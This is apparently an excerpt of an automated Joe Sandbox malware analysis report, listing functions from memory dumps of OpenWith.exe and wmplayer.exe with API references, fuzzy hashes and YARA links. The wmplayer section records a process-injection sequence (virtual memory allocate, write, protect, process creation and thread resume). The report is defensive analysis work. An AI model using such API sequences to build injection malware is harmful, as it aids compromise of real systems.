_calloc_dbg.MSVCRT(?,?,?,?,?,00000001,?,00007DF4E58136D8,?,?,?,?,?,00000000,?,?), ref: 00007DF4E5813388

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _calloc_dbg
String ID:
API String ID: 1170608187-0
Opcode ID: d979828ddffbd6fcc893aae94a80e91535cba3d12cd9533d0d4215f0c764342f
Instruction ID: b89c8975fdf117f42965b005fc3bda8ecf1b070569e829812756fbc1279e4547
Opcode Fuzzy Hash: d979828ddffbd6fcc893aae94a80e91535cba3d12cd9533d0d4215f0c764342f
Instruction Fuzzy Hash: 4F019620618D094FFF94FF2C9484B2673A1FBA4311B148266D81EC7289CE34DCA1C790

Function 000001F0D5515394 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001F0D55153E5

Memory Dump Source

Source File: 0000000F.00000003.2029886306.000001F0D5510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D5510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_1f0d5510000_OpenWith.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction ID: a6c6d4363aa9545478996ce8f5d0c567d04ef75efab1778e0a435b13cc838382
Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction Fuzzy Hash: D501B530210F095BE7599FA8D898B7577E0F788301F04053AE81AC3282DB34EC91CB81

Function 00007DF4E574B064 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E5759AF4: _malloc_dbg.MSVCRT ref: 00007DF4E5759B1A
Part of subcall function 00007DF4E5759AF4: NtAcceptConnectPort.NTDLL ref: 00007DF4E5759BC3

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E574B0C2

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@AcceptConnectPort_malloc_dbg
String ID:
API String ID: 1485176176-0
Opcode ID: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
Instruction ID: 370f056d0928c301e09e7573cfd19235e58716233b35bbe0dae5a648c7a3f205
Opcode Fuzzy Hash: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
Instruction Fuzzy Hash: BEF0C831218D0C4FEB98EB2D9C8C6B63BE5EBD8721B44427AE00BC7264DE68DD45C790

Function 00007DF4E5735330 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF4E57353BE), ref: 00007DF4E5735375

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction ID: 63bdcf3726eccc37fc278d6a1d628ff9cbf8db73f9c5f31f198f9026a27d04e1
Opcode Fuzzy Hash: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction Fuzzy Hash: 4701D671B14E065BE7689B29D488332B7E1FB98325F04453AD409C3280DB78E8A4C7C0

Function 00007DF4E5751510 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00007DF4E57463F9), ref: 00007DF4E5751526

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: d40400de8aff203246a65c93b039d135a7c4bde247e9e33ef195e3f9dc3e5471
Instruction ID: fbf7cf8c2f88beecccdd82a6f0302c18f3ee3b4bd5395fa83a8a1c969e77eb56
Opcode Fuzzy Hash: d40400de8aff203246a65c93b039d135a7c4bde247e9e33ef195e3f9dc3e5471
Instruction Fuzzy Hash: 0DF09A30A15E4E8FEB88EF1AD4D872173E1FF6830AF60007AD44AC32A0C77998A0C700

Function 00007DF4E578D6EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,00000000,00000000), ref: 00007DF4E578D732

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
Instruction ID: e8101d9a2f5e9d5a00c268767cc7afc1c071ff7f4de05a2024a46756cfb68a68
Opcode Fuzzy Hash: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
Instruction Fuzzy Hash: 55F0EC3071AE1A8FFF5CAB65A85866A33B1EF24316B04103FD807D25A0CF6D98619762

Function 00007DF4E5732178 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE ref: 00007DF4E57321BE

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 53ef2cf4c624f8d13d0a6f534f041d9c86cf4983b70d579de2bd58a17e54e5cf
Instruction ID: 0153c30a8bd401825c22194e908ae0709fad81c04a197c4051684a5a21be86cc
Opcode Fuzzy Hash: 53ef2cf4c624f8d13d0a6f534f041d9c86cf4983b70d579de2bd58a17e54e5cf
Instruction Fuzzy Hash: 78014F30A186449FDB50AF6AFD8563A77F1FB88320F44047FE11AC25A5CE385AA4C740

Function 00007DF4E5732124 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00007DF4E5732144

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
Instruction ID: 71b9ad9a90525967ea5980ee2d5bd4913e76ef7ab82eb527fd71f8c04d4963a1
Opcode Fuzzy Hash: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
Instruction Fuzzy Hash: 85F0E521F1C1488BE720AF7AAD8133F21A1DB84321F24453BD60BC2180D83999B19210

Function 00007DF4E5753474 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF4E57534BF

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
Instruction ID: d53d3cf320e418ad7c1c9f3227b9db76b969897958de4302702c34ad9a00a4d1
Opcode Fuzzy Hash: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
Instruction Fuzzy Hash: 14F08C746149088BEB48EF6CC488B6677E2FFA8315F100169E90EC72E4DB368988C741

Function 00007DF4E5741E78 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetProcAddressForCaller.KERNELBASE ref: 00007DF4E5741E9F

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
Instruction ID: f6e148cde529e321f16d033775a71358ad6514f18677e876de57e3fccff70100
Opcode Fuzzy Hash: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
Instruction Fuzzy Hash: 3CE0C211B08C090B6B6861AE24CCA7711D6CBDC172B04427BE41EC3695EC14CC610380

Function 00007DF4E575B680 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007DF4E575B6A5

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b92053583ae022722c3afb2b5e4b2eec27f0322d79cada6347a1aff319459fc1
Instruction ID: fe1bb1b070a82d86f8e5cc23edafe9ae8847952bb434d8953a93e5cea3b361b8
Opcode Fuzzy Hash: b92053583ae022722c3afb2b5e4b2eec27f0322d79cada6347a1aff319459fc1
Instruction Fuzzy Hash: E4E0C232B150240BE72C6ABD3C8A57A37DBC7CC572705423BE817C3298DC688C4602D2

Function 00007DF4E5732BD4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF4E5732C01

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
Instruction ID: 9850b4f2ccd504a193dba88852a0562de3763d41d736b9f96dcf474387682975
Opcode Fuzzy Hash: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
Instruction Fuzzy Hash: 2EE04F305049094BEB9CD61DC80976036E0EB5831AF608269D405C9291CB39D4ABCF42

Function 00007DF4E575B870 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E575B87A

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 12205ea8074b0c54af7b0ceede77e0325f5c308324c3d42d751b3e8c1284860c
Instruction ID: fd96bf7f5a3bda18e145adad9d0008338b794e907ddf380237876ba3dd4b2e5b
Opcode Fuzzy Hash: 12205ea8074b0c54af7b0ceede77e0325f5c308324c3d42d751b3e8c1284860c
Instruction Fuzzy Hash: 87D05E10B15E0D0BAB4863BE2C8963621E9EBDC222B440137B809C3254EC19DCA54251

Function 00007DF4E5741E4C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00007DF4E5741E6E

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: 4f860d95d3fcee9de383a729a318475cc13e57e65329ce4def72b86cc1b2d415
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: 75D0A720724D0D1BEB48737D1CD573621D6EBCC221F50113BF80EC2281D958CC750341

Function 00007DF4E57514C4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E57514ED

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
Instruction ID: aeb50deeaed7377a11d9b15c48f16254f554409847c780b2cd15ceb3e7b3fbad
Opcode Fuzzy Hash: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
Instruction Fuzzy Hash: DCE0EC30919D498FEB4ABB389848B5532E1FB18305F940565C40BC72D0E67CD5A6C740

Function 00007DF4E573E9D8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E573E9DE

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: aec56ff5670649d20d86566985ba58cafbf42df75ddfe2a4ac67394ae89725ff
Instruction ID: 90276a31701c09b55bff70c687e3d22a03c4a01ca2d030f5102fcc8fe6342a0d
Opcode Fuzzy Hash: aec56ff5670649d20d86566985ba58cafbf42df75ddfe2a4ac67394ae89725ff
Instruction Fuzzy Hash: DED01210A059094BBB5076FB1C8D2313698C73C2137000136E825C0161E548C8E09312

Function 00007DF4E5744434 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E574443D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 4fad1a04826b139af89cf909206fbc8b5ae341a752f874dda09751c78bab0021
Instruction ID: 2a3539d9f1426a0252bb017bb1fd812c3339b71d19b662613ba330b2334f39b6
Opcode Fuzzy Hash: 4fad1a04826b139af89cf909206fbc8b5ae341a752f874dda09751c78bab0021
Instruction Fuzzy Hash: 31B01224957C4B06FE1C37BA0C9A1163462BF14701FC40014D807D4084FA0CC1F54383

Function 00007DF4E5733810 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5733819

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
Instruction ID: 2fea4c77e3559e97547b2acc64e6374385ee8754ec0e954b15639c190ce050c2
Opcode Fuzzy Hash: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
Instruction Fuzzy Hash: 0EB0922495684A02EE5832660A6A1652460AB58211F840224D806C0451E50C80B48252

Function 00007DF4E5741C08 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE ref: 00007DF4E5741C30

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
Instruction ID: a73fdc2874b482a631b70742f01ab5ce7fb5281d997c6d7b5025fb5deb989a39
Opcode Fuzzy Hash: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
Instruction Fuzzy Hash: 5A114930B149884BFB58AB699C6D7A736E2FF94611F440277D40FC61A5FF2C9934C650

Non-executed Functions

Function 000001F0D53B0511 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction ID: 9c6f723353de5f7bfac1b68b00d860ec9f8fa9508ac40f659eae0282c9a534f1
Opcode Fuzzy Hash: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction Fuzzy Hash: 26B01132E28A0082E3880E0AB8023B0F2B0C30B300F00B0322008F3220C828CC08028F

Function 00007DF4E575BFA1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
Instruction ID: 5fd85f07ed1ea7bdab0a8e4948fe0c142f4bce46493ac3c5a4957af1fc578ae2
Opcode Fuzzy Hash: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
Instruction Fuzzy Hash: DDB01120EAC800C2C2080E0AB802330F2B0E30B300F0030302082F3A22CAA0CC80808F

Function 00007DF4E573AC1C Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3602e1d777bf5bb1f841dfb4cee0302930828d01fa0380f7af7a1f0542282627
Instruction ID: 0751c3cbb4998865a7d4e882d5ccb53d98e9673f9125dfd07c26e0e6d1d4f56a
Opcode Fuzzy Hash: 3602e1d777bf5bb1f841dfb4cee0302930828d01fa0380f7af7a1f0542282627
Instruction Fuzzy Hash:

Analysis Process: wmplayer.exePID: 7220, Parent PID: 6012COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	14.9%
Signature Coverage:	2.8%
Total number of Nodes:	281
Total number of Limit Nodes:	22

Executed Functions

Function 00007DF445C31958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF445C3199B
NtAllocateVirtualMemory.NTDLL ref: 00007DF445C31A3A
NtWriteVirtualMemory.NTDLL ref: 00007DF445C31A88
NtQueryInformationProcess.NTDLL ref: 00007DF445C31AB0
NtReadVirtualMemory.NTDLL ref: 00007DF445C31AE0
NtReadVirtualMemory.NTDLL ref: 00007DF445C31B13
NtReadVirtualMemory.NTDLL ref: 00007DF445C31B42
NtReadVirtualMemory.NTDLL ref: 00007DF445C31B76
NtProtectVirtualMemory.NTDLL ref: 00007DF445C31BBD
NtProtectVirtualMemory.NTDLL ref: 00007DF445C31C44
NtWriteVirtualMemory.NTDLL ref: 00007DF445C31C69
NtProtectVirtualMemory.NTDLL ref: 00007DF445C31C8D

Strings

H, xrefs: 00007DF445C31C15
H, xrefs: 00007DF445C31BF2

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuery_calloc_dbg
String ID: H$H
API String ID: 3959100322-136785262
Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
Instruction ID: 827b70db4a622e90fab39335b4af1a490e367a2041974849f12c747af9ac4397
Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
Instruction Fuzzy Hash: 10B14F7160CB8C8FDB64EF18D885A9AB7E5FBD4300F000A2EE58BC3251DB74E5458B86

Function 0000020343292D00 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFormatCurrentUserKeyPath.NTDLL ref: 0000020343293847
_calloc_dbg.MSVCRT ref: 000002034329399D

Strings

t, xrefs: 0000020343293A3C
N, xrefs: 0000020343293A34
;$dW, xrefs: 0000020343293CF8
MZ, xrefs: 000002034329394D
;Ln, xrefs: 0000020343293190
;$dW, xrefs: 0000020343293509
MZ, xrefs: 000002034329355F

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: CurrentFormatPathUser_calloc_dbg
String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
API String ID: 2292065830-84560671
Opcode ID: 157f1959f6c1ae296273567b1bb11043f0c817bd526c72fbd35fb0e6045e4e9b
Instruction ID: fad73bca4d13f0b3d09d949aa26c93af223531a7b3e1b7abcf67b2d936c05718
Opcode Fuzzy Hash: 157f1959f6c1ae296273567b1bb11043f0c817bd526c72fbd35fb0e6045e4e9b
Instruction Fuzzy Hash: 71A26DB0518B888FD375DF18D8897ABB7E4FB99701F100A2ED58AC3262DB749545CF82

Function 00007DF445C31CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF445C31290: RtlAddFunctionTable.KERNEL32 ref: 00007DF445C312BD

Part of subcall function 00007DF445C312C8: VirtualProtect.KERNELBASE ref: 00007DF445C312F5

Part of subcall function 00007DF445C31438: RegOpenKeyExW.KERNELBASE ref: 00007DF445C31497
Part of subcall function 00007DF445C31438: RegQueryValueExW.KERNELBASE ref: 00007DF445C314E6
Part of subcall function 00007DF445C31438: RegCloseKey.KERNELBASE ref: 00007DF445C3150C
Part of subcall function 00007DF445C31438: GetVolumeInformationW.KERNELBASE ref: 00007DF445C31570

_calloc_dbg.MSVCRT ref: 00007DF445C31DE3
CreateProcessW.KERNELBASE ref: 00007DF445C31F80
NtResumeThread.NTDLL ref: 00007DF445C31FA5
FindCloseChangeNotification.KERNELBASE ref: 00007DF445C31FBF
??3@YAXPEAX@Z.MSVCRT ref: 00007DF445C31FDC

Strings

-, xrefs: 00007DF445C31E95

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: Close$??3@ChangeCreateFindFunctionInformationNotificationOpenProcessProtectQueryResumeTableThreadValueVirtualVolume_calloc_dbg
String ID: -
API String ID: 3202447450-2547889144
Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
Instruction ID: 14f16056682e64db598bfac3f265a7d5cd37f4120c5b488ccd050655346c4379
Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
Instruction Fuzzy Hash: A1918F3161CA8D4FEF64FB64D8986ABB3E1FF98301F00452AD54BD2195DFB8E8018782

Function 000002034328CDEC Relevance: 4.6, APIs: 3, Instructions: 110
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE ref: 000002034328CE9F
BindIoCompletionCallback.KERNEL32 ref: 000002034328CED6
ConnectNamedPipe.KERNELBASE ref: 000002034328CEE7

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: NamedPipe$BindCallbackCompletionConnectCreate
String ID:
API String ID: 2502124517-0
Opcode ID: 48dc8f84732cfb64231cb8d7f70202a172daeda2543c226cff2892fb6bcf7530
Instruction ID: 83c4eb52be3f4a7a06af90cc77454fe95507b99417f014b2bbe6e69db35f41dd
Opcode Fuzzy Hash: 48dc8f84732cfb64231cb8d7f70202a172daeda2543c226cff2892fb6bcf7530
Instruction Fuzzy Hash: 1A316470218A088FE795EF28D8C8B5A77E9FB94310F504B29E45AC71D5DF74CA45CB81

Function 00007DF445C52704 Relevance: 4.5, APIs: 3, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007DF445C52715
_malloc_dbg.MSVCRT ref: 00007DF445C52731
NtQuerySystemInformation.NTDLL ref: 00007DF445C52755

Memory Dump Source

Source File: 00000010.00000002.2883976721.00007DF445C51000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c51000_wmplayer.jbxd

Similarity

API ID: InformationQuerySystem$_malloc_dbg
String ID:
API String ID: 1031377829-0
Opcode ID: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
Instruction ID: 64cb28b9a7e2fcfdd6f0148983f92425290d10451f9cab9f691be6e0be8a51df
Opcode Fuzzy Hash: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
Instruction Fuzzy Hash: 750119306199498BEB89FF64DCA8AAA77F1FB94301F440128A44BC21A0DF38D945CB42

Function 0000020343292C40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 0000020343292C98

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4474c39f48066915ffa65555ce1feaef67fb67948b8d908fd098de1ca5e9f695
Instruction ID: f17474af20be1afbe8512342fd9ce42d91bcd72ea71ac33e983d914266fde2e1
Opcode Fuzzy Hash: 4474c39f48066915ffa65555ce1feaef67fb67948b8d908fd098de1ca5e9f695
Instruction Fuzzy Hash: D821E471708B4C4FE750EE98E8CC76E76D8FB98301F61093EE94AC7261DA758A458B02

Function 000002034328262C Relevance: 3.3, APIs: 2, Instructions: 293
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 0000020343282732
SuspendThread.KERNELBASE ref: 0000020343282774

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ChangeCloseFindNotificationSuspendThread
String ID:
API String ID: 186804629-0
